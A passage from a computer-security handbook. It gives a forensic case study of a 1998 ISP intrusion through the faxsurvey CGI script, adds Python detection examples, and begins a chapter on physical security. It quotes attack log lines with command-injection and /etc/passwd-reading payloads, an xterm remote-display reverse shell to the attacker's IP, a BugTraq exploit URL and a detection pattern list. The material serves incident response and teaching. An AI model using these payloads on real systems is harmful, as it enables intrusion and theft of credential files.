tcp 0 0 VINEYARD.NET.http nhv-ct4-09.ix.ne.1136 SYN_RCVD
tcp 0 0 VINEYARD.NET.http nhv-ct4-09.ix.ne.1135 SYN_RCVD
tcp 0 0 VINEYARD.NET.http DSY27.VINEYARD.N.1079 SYN_RCVD
tcp 0 2456 VINEYARD.NET.http nhv-ct4-09.ix.ne.1134 ESTABLISHED
tcp 0 2268 VINEYARD.NET.http DSY27.VINEYARD.N.1078 ESTABLISHED
tcp 0 2522 VINEYARD.NET.http 209.174.140.26.1205 ESTABLISHED
tcp 0 8192 VINEYARD.NET.http host-209-214-118.1785 ESTABLISHED
tcp 0 4916 VINEYARD.NET.http host-209-214-118.1784 ESTABLISHED
tcp 0 0 VINEYARD.NET.http host-209-214-118.1783 ESTABLISHED
tcp 0 0 VINEYARD.NET.http ASY14.VINEYARD.N.1163 FIN_WAIT_2
tcp 0 0 LOCALHOST.VINEYA.sendm LOCALHOST.VINEYA.1135 ESTABLISHED
tcp 0 0 LOCALHOST.VINEYA.1135 LOCALHOST.VINEYA.sendm ESTABLISHED
tcp 0 0 VINEYARD.NET.smtp 208.135.218.34.1479 ESTABLISHED
tcp 0 3157 VINEYARD.NET.pop ASY5.VINEYARD.NE.1027 ESTABLISHED
tcp 0 0 APACHE.VINEYARD..ssh MAC-EWB.VINEYARD.2050 ESTABLISHED
tcp 0 0 VINEYARD.NET.http host-209-214-118.1782 FIN_WAIT_2
tcp 0 0 VINEYARD.NET.http host-209-214-118.1781 FIN_WAIT_2
tcp 0 0 VINEYARD.NET.http host-209-214-118.1775 FIN_WAIT_2
tcp 0 0 VINEYARD.NET.http 56k-2234.hey.net.1099 FIN_WAIT_2
tcp 0 0 VINEYARD.NET.https ESY8.VINEYARD.NE.1557 FIN_WAIT_2
tcp 0 0 LOCALHOST.VINEYA.sendm LOCALHOST.VINEYA.1058 ESTABLISHED
tcp 0 0 LOCALHOST.VINEYA.1058 LOCALHOST.VINEYA.sendm ESTABLISHED
tcp 0 0 APACHE.VINEYARD..smtp m28.boston.juno..54519 ESTABLISHED
tcp 0 0 APACHE.VINEYARD..ssh MAC-EWB.VINEYARD.nfs ESTABLISHED
tcp 0 328 APACHE.VINEYARD..ssh MAC-EWB.VINEYARD.2048 ESTABLISHED
tcp 0 0 VINEYARD.NET.http ASY14.VINEYARD.N.1162 FIN_WAIT_2
tcp 0 0 VINEYARD.NET.http ASY14.VINEYARD.N.1160 FIN_WAIT_2
tcp 0 0 NEXT.VINEYARD.NE.ssh ASY12.VINEYARD.N.1047 ESTABLISHED
tcp 0 7300 VINEYARD.NET.pop DSY27.VINEYARD.N.1061 ESTABLISHED
tcp 0 0 NEXT.VINEYARD.NE.imap2 ASY12.VINEYARD.N.1041 ESTABLISHED
tcp 0 0 VINEYARD.NET.3290 VINEYARD.NET.imap2 CLOSE_WAIT
tcp 0 0 VINEYARD.NET.ssh simsong.ne.media.1017 ESTABLISHED
tcp 0 0 APACHE.VINEYARD..3098 KRLDB110-06.spli.X11 ESTABLISHED
tcp 8760 0 VINEYARD.NET.1022 BACKUP.VINEYARD..ssh ESTABLISHED
tcp 0 0 LOCALHOST.VINEYA.4778 *.* LISTEN
tcp 0 0 LOCALHOST.VINEYA.domai *.* LISTEN
tcp 0 0 NET10.VINEYARD.N.domai *.* LISTEN
tcp 0 0 SMTP4.VINEYARD.N.domai *.* LISTEN
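The two observations that gave this intrusion away (shells owned by the web server account, and a connection from the server to a remote X11 display) can be checked mechanically. The following Python code is an added example, not part of the handbook: it reads BSD-style ps auxww and netstat -a text such as the listings in this case study. The service-account list, the function names and the 6000-6063 X11 port range are assumptions made for the example.

```python
# Constructed input: rows copied from the ps and netstat listings in this case study.
PS_SAMPLE = """\
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
mail 18120 1.3 0.3 816 724 ?? S 8:56PM 0:00.46 smap
root 53 0.0 0.1 268 296 ?? Ss 10Sep98 0:38.23 gettyd -s
root 18670 0.0 0.5 560 1276 ?? S Tue02AM 0:04.77 (xterm)
http 18671 0.0 0.1 244 276 p0 Is Tue02AM 0:02.23 /bin/sh
http 26225 0.0 0.1 236 276 p0 I+ Tue04AM 0:00.7 /bin/sh
"""

NETSTAT_SAMPLE = """\
tcp 0 2522 VINEYARD.NET.http 209.174.140.26.1205 ESTABLISHED
tcp 0 0 APACHE.VINEYARD..ssh MAC-EWB.VINEYARD.2050 ESTABLISHED
tcp 0 0 APACHE.VINEYARD..3098 KRLDB110-06.spli.X11 ESTABLISHED
tcp 0 0 LOCALHOST.VINEYA.domai *.* LISTEN
"""

# Assumption: accounts that should never own a shell on a production server.
SERVICE_ACCOUNTS = {"http", "www", "nobody", "daemon"}
SHELLS = {"sh", "bash", "csh", "tcsh", "ksh", "zsh"}


def service_account_shells(ps_text):
    """Return shells owned by service accounts in `ps auxww` output."""
    hits = []
    for line in ps_text.strip().splitlines()[1:]:      # skip the header row
        f = line.split(None, 10)                       # COMMAND may contain spaces
        if len(f) < 11:
            continue
        user, pid, tty, started, command = f[0], f[1], f[6], f[8], f[10]
        program = command.split()[0].strip("()").lstrip("-").rsplit("/", 1)[-1]
        if user in SERVICE_ACCOUNTS and program in SHELLS:
            hits.append({"user": user, "pid": int(pid), "tty": tty,
                         "started": started, "interactive": tty != "??"})
    return hits


def split_endpoint(addr):
    """BSD netstat prints host.port; the (truncated) host may itself contain dots."""
    host, _, port = addr.rpartition(".")
    return host.rstrip("."), port


def is_x11_port(port):
    return port.upper() == "X11" or (port.isdigit() and 6000 <= int(port) <= 6063)


def outbound_x11(netstat_text):
    """Return established TCP connections whose remote end is an X11 display."""
    hits = []
    for line in netstat_text.strip().splitlines():
        f = line.split()
        if len(f) != 6 or f[0] != "tcp" or f[5] != "ESTABLISHED":
            continue
        local_host, local_port = split_endpoint(f[3])
        remote_host, remote_port = split_endpoint(f[4])
        # A server talking to a remote X display means some local process is
        # drawing its window on somebody else's screen.
        if is_x11_port(remote_port) and not is_x11_port(local_port):
            hits.append({"local": local_host, "local_port": local_port,
                         "remote": remote_host})
    return hits


def triage(ps_text, netstat_text):
    shells = service_account_shells(ps_text)
    x11 = outbound_x11(netstat_text)
    return {"shells": shells, "x11": x11,
            "remote_shell_suspected": bool(x11) and any(s["interactive"] for s in shells)}


if __name__ == "__main__":
    report = triage(PS_SAMPLE, NETSTAT_SAMPLE)
    for s in report["shells"]:
        print("shell owned by service account:", s)
    for c in report["x11"]:
        print("outbound X11 connection:", c)
    print("remote shell suspected:", report["remote_shell_suspected"])
```

Neither signal is proof on its own; it is the combination of an interactive shell under a service account with an outbound display connection that matches what the ISP found here.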
The ISP concluded that the attacker had used a vulnerability in a CGI script to spawn an xterm back to his own remote machine. To test this hypothesis, a quick search of the ISP's web server logs was carried out:
% grep -I krldb110-06 /vni/apache/log/access_log
1. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:48 -0400] "GET /cgi-bin/phf?Qname=me%0als%20-lFa HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
2. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:50 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa HTTP/1.0" 200 5469 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
3. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:52 -0400] "GET /cgi-bin/viewsource?../../../../../../../../etc/passwd HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
4. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:53 -0400] "GET /cgi-bin/htmlscript?../../../../../../../../etc/passwd HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
5. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:54 -0400] "GET /cgi-bin/campas?%0als%20-lFa HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
6. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:55 -0400] "GET /cgi-bin/handler/useless_shit;ls%20-lFa|?data=Download HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
7. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:56 -0400] "GET /cgi-bin/php.cgi?/etc/passwd HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
8. krldb110-06.splitrock.net - - [06/Oct/1998:02:54:30 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa HTTP/1.1" 200 5516 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
9. krldb110-06.splitrock.net - - [06/Oct/1998:02:54:44 -0400] "GET /cgi-bin/faxsurvey?uname%20-a HTTP/1.1" 200 461 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
10. krldb110-06.splitrock.net - - [06/Oct/1998:02:55:03 -0400] "GET /cgi-bin/faxsurvey?id HTTP/1.1" 200 381 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
11. krldb110-06.splitrock.net - - [06/Oct/1998:02:55:39 -0400] "GET /cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.1" 200 79467 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
12. krldb110-06.splitrock.net - - [06/Oct/1998:02:55:44 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa%20/usr/ HTTP/1.1" 200 1701 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
13. krldb110-06.splitrock.net - - [06/Oct/1998:04:31:55 -0400] "GET /cgi-bin/faxsurvey?id HTTP/1.1" 200 381 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/web.vineyard.net"
14. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:01 -0400] "GET /cgi-bin/faxsurvey?pwd HTTP/1.1" 200 305 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/web.vineyard.net"
15. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:08 -0400] "GET /cgi-bin/faxsurvey?/bin/pwd HTTP/1.1" 200 305 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/web.vineyard.net"
16. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:33 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa HTTP/1.1" 200 5516 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/web.vineyard.net"
17. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:55 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa%20../conf/ HTTP/1.1" 200 305 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/web.vineyard.net"
Note that lines 1 through 7 occurred within a few seconds of each other. It appears that the attacker used an automated tool that looks for CGI vulnerabilities. In lines 8 through 17, the attacker exploits a vulnerability in the faxsurvey script. This was almost certainly done with a different tool. One reason is that the version of the HTTP protocol supported by the client changed from "HTTP/1.0" to "HTTP/1.1".
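The reasoning applied to this log (a burst of probes against many scripts, then repeated requests to the one script that answered, with a change of HTTP version in between) can be automated. The following Python code is an added example, not part of the handbook: it decodes the CGI arguments, keeps requests that look like shell commands or file reads, and splits each client's requests into phases. The sample lines are transcribed from the access_log listing in this case study plus one constructed benign request; the command patterns and the 15-second and 300-second thresholds are assumptions.

```python
import re
from datetime import datetime
from urllib.parse import unquote

# Constructed sample: entries 1, 2, 3, 7, 8, 9, 11, 13 and 15 of the listing,
# plus one made-up benign request from client.example.net.
SAMPLE_LOG = r'''
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:48 -0400] "GET /cgi-bin/phf?Qname=me%0als%20-lFa HTTP/1.0" 404 - "-" "Mozilla/4.0" "/htdocs/biz/captiva"
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:50 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa HTTP/1.0" 200 5469 "-" "Mozilla/4.0" "/htdocs/biz/captiva"
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:52 -0400] "GET /cgi-bin/viewsource?../../../../../../../../etc/passwd HTTP/1.0" 404 - "-" "Mozilla/4.0" "/htdocs/biz/captiva"
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:56 -0400] "GET /cgi-bin/php.cgi?/etc/passwd HTTP/1.0" 404 - "-" "Mozilla/4.0" "/htdocs/biz/captiva"
client.example.net - - [06/Oct/1998:02:54:00 -0400] "GET /index.html HTTP/1.0" 200 1024 "-" "Mozilla/4.0" "/htdocs/biz/captiva"
krldb110-06.splitrock.net - - [06/Oct/1998:02:54:30 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa HTTP/1.1" 200 5516 "-" "Mozilla/4.0" "/htdocs/biz/captiva"
krldb110-06.splitrock.net - - [06/Oct/1998:02:54:44 -0400] "GET /cgi-bin/faxsurvey?uname%20-a HTTP/1.1" 200 461 "-" "Mozilla/4.0" "/htdocs/biz/captiva"
krldb110-06.splitrock.net - - [06/Oct/1998:02:55:39 -0400] "GET /cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.1" 200 79467 "-" "Mozilla/4.0" "/htdocs/biz/captiva"
krldb110-06.splitrock.net - - [06/Oct/1998:04:31:55 -0400] "GET /cgi-bin/faxsurvey?id HTTP/1.1" 200 381 "-" "Mozilla/4.0" "/htdocs/web.vineyard.net"
krldb110-06.splitrock.net - - [06/Oct/1998:04:32:08 -0400] "GET /cgi-bin/faxsurvey?/bin/pwd HTTP/1.1" 200 305 "-" "Mozilla/4.0" "/htdocs/web.vineyard.net"
'''.strip().splitlines()

LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/\d\.\d)" '
    r'(?P<status>\d{3}) (?P<size>\S+)')
CGI_RE = re.compile(r'^/cgi-bin/(?P<script>[^/?;]+)(?P<arg>.*)$', re.S)

# Assumption: decoded arguments that look like a shell command or a file read.
SUSPICIOUS = re.compile(
    r'(?:^|[\n;|`])\s*(?:/\S*/)?(?:ls|cat|id|uname|pwd|sh|xterm)\b'
    r'|/etc/passwd|\.\./\.\./')


def parse(line):
    """Parse one log line; return None if it is not in the expected format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    cgi = CGI_RE.match(m["target"])
    arg = unquote(cgi["arg"]).lstrip("?") if cgi else ""
    return {"host": m["host"].lower(),
            "time": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "proto": m["proto"], "status": int(m["status"]),
            "script": cgi["script"] if cgi else None, "arg": arg,
            "suspicious": bool(cgi and SUSPICIOUS.search(arg))}


def split_phases(events, max_gap=300):
    """Start a new phase when the HTTP version changes or the client pauses."""
    phases = []
    for ev in events:
        last = phases[-1][-1] if phases else None
        if (last is None or ev["proto"] != last["proto"]
                or (ev["time"] - last["time"]).total_seconds() > max_gap):
            phases.append([])
        phases[-1].append(ev)
    return phases


def describe(phase):
    scripts = {e["script"] for e in phase}
    span = (phase[-1]["time"] - phase[0]["time"]).total_seconds()
    executed = [e["arg"] for e in phase if e["status"] == 200]
    if len(scripts) >= 3 and span <= 15:
        kind = "scanner sweep"            # many scripts probed within seconds
    elif len(scripts) == 1 and executed:
        kind = "targeted exploitation"    # one script, requests succeeding
    else:
        kind = "unclassified"
    return {"kind": kind, "proto": phase[0]["proto"], "scripts": sorted(scripts),
            "span_s": span, "executed": executed}


def analyse(lines):
    """Group suspicious CGI requests per client and describe each phase."""
    by_host = {}
    for line in lines:
        ev = parse(line)
        if ev and ev["suspicious"]:
            by_host.setdefault(ev["host"], []).append(ev)
    return {host: [describe(p) for p in split_phases(sorted(evs, key=lambda e: e["time"]))]
            for host, evs in by_host.items()}


if __name__ == "__main__":
    for host, phases in analyse(SAMPLE_LOG).items():
        for p in phases:
            print(host, p["kind"], p["proto"], p["scripts"], p["executed"])
```

A 200 status on a request whose decoded argument is a command is the line to act on first: it marks the script that actually ran the input.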
The web server log file revealed that the attacker's full hostname was krldb110-06.splitrock.net. Using the host command, this name can be translated into an actual IP address:
‫‪apache: {43} % host krldb110-06.splitrock.net‬‬
‫‪krldb110-06.splitrock.net has address 209.156.113.121‬‬
‫‪apache: {44} %‬‬
Examining this log file, it appears that the /cgi-bin/faxsurvey script has a flaw that allows an attacker to run arbitrary commands (otherwise, why would the attacker keep calling this script and sending URLs with different arguments?). If this were the case, then the following commands must have been executed by the attacker:
‫‪ls -lFa‬‬
‫‪ls -lFa‬‬
‫‪uname -a‬‬
‫‪id‬‬
‫‪cat /etc/passwd‬‬
‫‪ls -lFa /usr/‬‬
‫‪id‬‬
‫‪pwd‬‬
‫‪/bin/pwd‬‬
‫‪ls -lFa‬‬
ls -lFa ../conf/
It is not clear from the log files how the attacker got from running these commands to running the xterm command, but it is quite clear that the xterm command was run: the http line in the output of the w command, the running xterm process, and the X11 line in the netstat output are all evidence of it.
At this point, the ISP searched its other log files for the attacker's hostname. One suspicious result was found in the messages log file; apparently the attacker had tried to exploit a flaw in POP or qpopper:
apache: {15} % grep -i krldb110-06 *
messages:Oct 6 03:38:29 apache popper.bsdos[22312]: @KRLDB110-06.splitrock.net: -ERR POP timeout
To preserve a record of the attacker's processes, they were stopped, an image of their process memory was saved, and then the processes were killed.
Following this, a rule was added to the ISP's routers to block access from the attacker's IP addresses. The permissions of the faxsurvey script were changed to prevent any access, so that everything would be ready for the start of an investigation. A few days later the script was removed from the web server.
The victim ISP contacted SplitRock Services, the ISP responsible for the attacker's IP address. It turned out that SplitRock operated several modem pools that it provided to another ISP under a lease agreement. SplitRock was asked to preserve its log files so that they could be used in future investigations.
Using the strings command, it became possible to obtain much more information about the attacker. One group of strings related to the shell history, which was a list of the commands typed by the attacker. It appeared that the attacker had downloaded a rootkit and had also attempted a buffer overflow attack against the system's IMAP server:
‫‪-lFa‬‬
‫‪gcc -o s s.c‬‬
‫‪st2.c‬‬
‫‪ftp 209.156.113.121‬‬
‫‪cron.c‬‬
‫‪gcc -o s st2.c‬‬
‫‪cxterm.c ./s console‬‬
‫‪x2.c‬‬
‫‪t.s‬‬
‫‪qpush.c .121‬‬
‫‪cat t.c‬‬
‫‪qpush.c‬‬
‫‪cat.c‬‬
‫‪ppp.c‬‬
‫‪cat s.c‬‬
‫‪t2.c‬‬
‫‪gc c‬‬
‫‪cron.c‬‬
‫‪ls -lFa‬‬
‫‪cxterm.c‬‬
‫‪./s -v c2 tcsh‬‬
‫‪./s p0‬‬
‫‪x2.c‬‬
‫‪ls -lFa / README‬‬
‫‪cat.s‬‬
‫‪README.debian‬‬
‫‪ls -lFa‬‬
‫‪qpush‬‬
‫‪cat /w‬‬
‫‪qpush.c‬‬
‫‪ls -lFa / qpush.c.old‬‬
‫‪cat.s‬‬
‫‪Gf: not found‬‬
‫‪_=.s‬‬
‫‪/tmp‬‬
‫‪$ : not found‬‬
‫‪mfs:28‬‬
‫‪gcc -o s steal.c /bin/sh‬‬
‫‪ls -lFa *.c‬‬
‫‪/bin/sh‬‬
‫‪/bin/sh‬‬
‫‪/etc/inetd.conf‬‬
‫‪qpush.c‬‬
‫‪/usr/bin/gcc‬‬
‫‪n/gcc‬‬
‫‪./cc‬‬
‫‪Expr‬‬
‫‪Done‬‬
‫‪/bin/sh‬‬
‫‪inetd.conf‬‬
‫‪t) | telnet 127.1 143‬‬
‫‪cd /etc‬‬
‫‪cat.s‬‬
which pwd
ls -lFa
expr $L + 1
ls -lFa
./cc -10
./cc
The second kind of strings found in the memory images corresponded to shell variables. Many of them were variables that would be set for a process spawned from a CGI script, which confirmed that the shell had been started as the result of a CGI attack. The portion shown below confirmed that the CGI script responsible for the intrusion was the faxsurvey script:
GATEWAY_INTERFACE=CGI/1.1
REMOTE_HOST=krldb110-06.splitrock.net
MACHTYPE=i386-pc-bsdi3.1
HOSTNAME=apache.vineyard.net
L=100
SHLVL=1
REMOTE_ADDR=209.156.113.121
QUERY_STRING=/usr/X11R6/bin/xterm%20-display%20209.156.113.121:0.0%20-rv%20-e%20/bin/sh
DOCUMENT_ROOT=/htdocs/biz/captiva
REMOTE_PORT=4801
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)
HTTP_ACCEPT=application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
SCRIPT_FILENAME=/vni/cgi-bin/faxsurvey
HTTP_HOST=www.captivacruises.com
LOGNAME=http
WINDOWID=8388621
_=/bins
REQUEST_URI=/cgi-bin/faxsurvey?/usr/X11R6/bin/xterm%20-display%20209.156.113.121:0.0%20-rv%20-e%20/bin/sh
SERVER_SOFTWARE=Stronghold/2.2 Apache/1.2.5 C2NetUS/2002
TERM=xterm
HTTP_CONNECTION=Keep-Alive
PATH=/usr/local/bin:/bin:/usr/bin:/usr/sbin
HTTP_ACCEPT_LANGUAGE=en-us
DISPLAY=209.156.113.121:0.0
SERVER_PROTOCOL=HTTP/1.1
HTTP_ACCEPT_ENCODING=gzip, deflate
SHELL=/bin/tcsh
REQUEST_METHOD=GET
OSTYPE=bsdi3.1
[email protected]
SERVER_ROOT=/usr/local/apache
TERMCAP=xterm|vi|xterm-ic|xterm-vi|xterm with insert character instead of insert mode:
:al@:dl@:im=:ei=:mi@:ic=\E[@: :AL=\E[%dL:DC=\E[%dP:DL=\E[
%dM:DO=\E[%dB:IC=\E[%d@:UP=\E[%dA: :al=\E[L:am: :bs:cd=\E[J:ce=\
E[K:cl=\E[H\E[2J:cm=\E[%i%d;%dH:co#80: :cs=\E[%i%d;%dr:ct=\E[3k: :dc
SERVER_PORT=80
SCRIPT_NAME=/cgi-bin/faxsurvey
HOSTTYPE=i386
After the intrusion, the victim ISP contacted the Boston office of the Federal Bureau of Investigation. The ISP was informed that before the Boston office would open an investigation, there had to be damages exceeding a threshold of eight thousand dollars. Because the damage had not reached this minimum threshold, no investigation was opened. Although the reason for such minimums is understandable, it would be better if this were not so, for two main reasons:
• Many attacks are carried out by relatively young attackers who might stop such activities on receiving a warning or, at most, a suspended sentence. The lack of official investigation and follow-up only encourages these attackers to move on to larger and larger crimes, until they become responsible for serious damage.
• It is possible that the attacker is highly skilled and is involved in other illegal activities that usually go unnoticed by others. There are many cases in which investigations of small crimes have led law enforcement agencies to major economic crimes. For example, a 75-cent accounting discrepancy led Cliff Stoll to track down a computer intruder who, it eventually turned out, had broken into United States commercial and military computers on the orders of the Soviet Union. (The details of this story are told in Stoll's classic hacker detective story, "The Cuckoo's Egg".)
When the matter was cleared up, it turned out that the vulnerability in the faxsurvey script had been reported on the BugTraq mailing list about three months before the attack took place. Either none of the ISP's staff had read the BugTraq mailing list messages, or nobody knew that the faxsurvey script was installed on the system:
Date: Tue, 4 Aug 1998 07:41:24 -0700
Reply-To: [email protected]
From: Tom <[email protected]>
Subject: remote exploit in faxsurvey cgi-script

Hi!
There exist a bug in the 'faxsurvey' CGI-Script, which allows an attacker to execute any command s/he wants with the permissions of the HTTP-Server.
All the attacker has to do is type http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd in his favorite Web-Browser to get a copy of your Password-File.
All S.u.S.E. 5.1 and 5.2 Linux Dist. (and I think also older ones) with the HylaFAX package installed are vulnerable to this attack.
AFAIK the problem exists in the call of 'eval'.
I notified the S.u.S.E. team (suse.de) about that problem. Burchard Steinbild <[email protected]> told me, that they have not enough time to fix that bug for their 5.3 Dist., so they decided to just remove the script from the file list.

After the attack, the ISP carried out the following cleanup:
• An immediate backup of all disks was made. This backup was preserved as evidence in case damage was discovered that needed to be pursued.
• The system was scanned for files with new permissions. None were found.
• Access permissions on the /usr/include directory and the C compiler were changed so that only staff members could access these files and compile new programs.
• Key programs were compared with the originally released versions on CD-ROM to identify any changes. They had not been modified.
• All log files were manually examined for additional suspicious activity. None was found.
• After one week, the router rule blocking SplitRock was removed.
Chapter Three
Physical Security
Overview
"Physical security" is everything that is done before commands are typed at the keyboard: building an alarm system, putting a key lock on the computer's power supply, a locked computer room equipped with closed-circuit cameras, power distribution units, and an uninterruptible power supply (UPS). Although physical security is a very important issue, it is often overlooked. This chapter discusses many physical security threats, including environmental hazards, sabotage, and theft, and offers suggestions on how to deal with them.
Elements of physical security
People first
It goes without saying that in emergencies and disasters, the lives and safety of personnel must always take precedence over data or equipment. Although there may be very limited exceptions to this principle (for example, in sensitive military situations), you should never lose sight of what is truly irreplaceable.
Planning for the forgotten threats
Surprisingly, many organizations pay no attention to physical security. A New York investment house that was constantly being robbed invested tens of thousands of dollars in computer security testing to prevent unauthorized entry during the day, but after a while concluded that the problem was that at night the cleaner left the entrance doors of the computer room open while cleaning it. A magazine in San Francisco had more than one hundred thousand dollars' worth of its computers stolen over a holiday, because an employee had used his electronic key card to open the building door and disable the alarm system. After entering the building, this person had gone to the equipment room, where the alarm system was located, and had also pulled the printed log out of the alarm system's printer and destroyed it.
Other organizations assume that dealing properly with physical security is too complicated or too difficult. Few organizations have the ability to protect their servers from nuclear attacks, major earthquakes, or terrorist bombings; but such catastrophic possibilities should never be used as an excuse that keeps the organization from planning carefully for adverse events.
The matters that physical security covers (threats, practices, and protections) are practically different for different sites or organizations. Because every site differs from every other, this chapter cannot offer a set of specific recommendations; it can only provide a starting point, a list of issues to consider, and a suggested procedure for formulating an actual plan.
The physical security plan
The first step in physically securing your facilities is to formulate a written plan that sets out your current physical security needs and your intended direction for the future. Ideally, the physical plan should be part of your written security policy. To be complete, this plan needs to be read by other staff members, and it should also be approved by the organization's senior management. The purpose of the plan is therefore both planning and political.
Your security plan should describe the assets you are protecting, their value, the locations where these items are housed, the likely threats they face, and the probability of those threats occurring. Do not forget to count information as one of the assets. You also need to specify the security perimeter (the boundary between the rest of the world and your secure area) and any holes in the perimeter, along with your defensive measures, your plans for strengthening them, and the cost of implementing those plans.
If you run particularly critical facilities, pay close attention to drawing up this plan and, for example, have it evaluated by an outside firm that specializes in disaster recovery planning and risk assessment. Treat your security plan as a sensitive document, because by its very nature it contains detailed information about your weakest defensive points.
The disaster recovery plan
You also need a plan for immediately and temporarily securing computer equipment and for loading backups onto new systems in case your computers are stolen or damaged. This plan is known as a disaster recovery plan. The plan should also cover its own security components; that is, even while you are working at a disaster-stricken site or recovering a system from a disaster, security principles should ideally still be observed.
You can regularly test parts of this plan by renting or borrowing a computer system and trying to restore backups. Less frequently, you can also run through the entire plan to make sure that the alternate facilities are available and work properly when you need them.
Other contingencies
In addition to the items already mentioned, you may want to consider the effect of the following on your operations:
Loss of telephone service or network connections
How would the loss of these services and connections affect your normal operations?
Vendor continuity
How important is support? If the vendor goes out of business or makes changes that you do not want to adopt, can you move to another hardware or software system?
Significant absenteeism of staff
Would this affect your ability to carry out operations?
Death, incapacitation, or dismissal of a key member of the organization
Can every member of your computer organization be replaced? What are the contingency plans?
Disaster recovery planning should be consistent with your organization-wide contingency plans. Preserving information is usually vital, but it will be less useful when the space, power, or equipment needed to continue operating is not available.
Protecting computer hardware
Physically protecting a computer involves many of the same issues we face when protecting a typewriter, jewelry, or filing drawers full of records. As with a typewriter, an office computer is something that many people in the office need access to. Like jewelry, computers are valuable and are generally easy for a thief to sell. As with legal files and financial records, if you have no backup, or if the backup was stolen or destroyed along with the computer, the information you have lost may be irreplaceable. Even if you do have a backup, you will still need to spend considerable time setting up a replacement system. Finally, there is always the possibility that the stolen information, or merely the fact that your information has been stolen, will be used against you.
What makes matters worse is that computers and computer media are highly sensitive to their environment. A computer's power supply can easily burn out if it is plugged in and lightning strikes nearby.
There are various measures that can be taken to protect computer systems against physical dangers. Many of these solutions simultaneously protect the system from natural disasters, outsiders, and inside saboteurs.
Protecting against environmental threats
Computers usually need precisely balanced physical and environmental conditions to work properly. Upsetting this balance can cause a computer to fail in unexpected and usually undesirable ways. Even worse, the computer may continue to operate erratically, produce wrong results, and corrupt valuable data.
Fire
Computers usually survive fire very poorly. If you want your computer to be an exception to this rule, make sure that good fire-fighting equipment is available nearby and that staff are trained to use it well. Automatic gas discharge systems and water sprinkler systems each have advantages and disadvantages that must be considered carefully.
Make sure that the wiring is protected as well as the computers. Ensure that smoke detectors and sprinkler heads, if used, are installed so that they cover the wires in cable trays (often above suspended ceilings) and in cable ducts.
Smoke
Smoke is very damaging to computer equipment. It is a potent abrasive and collects on the heads of unsealed magnetic disks, optical disks, and tape drives. Sometimes the smoke is generated by the computer itself. Electrical fires, particularly those caused by the transformers in video monitors, can produce pungent, acrid smoke that may damage other equipment and may also be poisonous or carcinogenic. Another significant danger is the smoke from cigarettes and pipes.
Install smoke detectors in every room that contains computer equipment, and make sure detectors are also present under raised floors and above suspended ceilings. Do not allow anyone to smoke in your computer room.
Earthquake
Nearly every part of the earth experiences occasional tremors. Some buildings collapse in an earthquake and many remain standing. Careful attention to the placement of shelves and bookcases in your office can increase the chance that you and your computer will survive the most severe disasters.
Avoid placing computers on high surfaces or near windows, and avoid putting heavy objects on shelves near computers. Computers can be placed under strong tables or fastened to the surface they sit on. For this you can use bolts, tie-down straps, or other means. (Doing so also helps prevent theft.)
Temperature extremes
